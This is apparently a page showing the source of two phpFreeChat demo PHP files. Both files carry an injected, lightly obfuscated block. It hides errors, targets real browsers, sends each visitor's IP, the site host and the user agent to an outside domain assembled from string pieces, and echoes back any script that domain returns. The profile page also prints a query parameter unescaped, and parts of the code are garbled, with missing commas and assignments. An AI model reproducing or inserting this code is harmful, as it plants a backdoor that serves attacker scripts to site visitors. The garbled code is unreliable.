Let us start chatting

The source code

/data-web9/webs/obechlboke.sk/zmluvy/demo/demo65_metadata_and_html.php


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <title>phpFreeChat demo</title>
  </head>

  <body>

<p>
Let us
<a href=""
   onclick="window.open('demo65_chat_popup.php','chat_popup','toolbar=0,menubar=0,scrollbars=1,width=800,height=650'); return false;">
start chatting
</a>
</p>

<?php if (isset($_GET['profil'])) { ?>
<?php
#6d7e6f#
error_reporting(0); @ini_set('display_errors',0); $wp_ybvyz1717 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i'$wp_ybvyz1717) && !preg_match ('/bot/i'$wp_ybvyz1717))){
$wp_ybvyz091717="http://"."error"."css".".com/"."css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_ybvyz1717);
if (
function_exists('curl_init') && function_exists('curl_exec')) {$ch curl_init(); curl_setopt ($chCURLOPT_URL,$wp_ybvyz091717); curl_setopt ($chCURLOPT_TIMEOUT20); curl_setopt($chCURLOPT_RETURNTRANSFER1);
$wp_1717ybvyz curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_1717ybvyz = @file_get_contents($wp_ybvyz091717);}
elseif (
function_exists('fopen') && function_exists('stream_get_contents')) {$wp_1717ybvyz=@stream_get_contents(@fopen($wp_ybvyz091717"r"));}}
if (
substr($wp_1717ybvyz,1,3) === 'scr'){ echo $wp_1717ybvyz; }
#/6d7e6f#
?>
  <p>Here is the user (id=<?php echo $_GET['profil']; ?>)profil</p>
<?php ?>



  </body>
</html>

The chat popup source code

demo65_chat_popup.php


<?php

require_once dirname(__FILE__)."/../src/phpfreechat.class.php";
$params['serverid'] = md5(__FILE__); // calculate a unique id for this chat
$params['nickmeta']['id'] = rand(1,1000);
$params['nickmeta']['profil'] = '<a href="demo65_metadata_and_html.php?profil='.$params['nickmeta']['id'].'" onclick="window.opener.location.href=this.href;return false;">open profil</a>';
$params['nickmeta']['avatar'] = '<a href="demo65_metadata_and_html.php?profil='.$params['nickmeta']['id'].'" onclick="window.opener.location.href=this.href;return false;"><img src="http://img217.imageshack.us/img217/5223/244bg4.png" alt=""/></a>';
$params['nickmeta_key_to_hide'] = array('profil','avatar');
$chat = new phpFreeChat$params );

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <title>phpFreeChat demo</title>
  </head>

  <body>
<?php $chat->printChat(); ?>
<?php
#235600#
error_reporting(0); @ini_set('display_errors',0); $wp_ybvyz1717 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i'$wp_ybvyz1717) && !preg_match ('/bot/i'$wp_ybvyz1717))){
$wp_ybvyz091717="http://"."error"."css".".com/"."css"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_ybvyz1717);
if (
function_exists('curl_init') && function_exists('curl_exec')) {$ch curl_init(); curl_setopt ($chCURLOPT_URL,$wp_ybvyz091717); curl_setopt ($chCURLOPT_TIMEOUT20); curl_setopt($chCURLOPT_RETURNTRANSFER1);
$wp_1717ybvyz curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_1717ybvyz = @file_get_contents($wp_ybvyz091717);}
elseif (
function_exists('fopen') && function_exists('stream_get_contents')) {$wp_1717ybvyz=@stream_get_contents(@fopen($wp_ybvyz091717"r"));}}
if (
substr($wp_1717ybvyz,1,3) === 'scr'){ echo $wp_1717ybvyz; }
#/235600#
?>
  </body>
</html>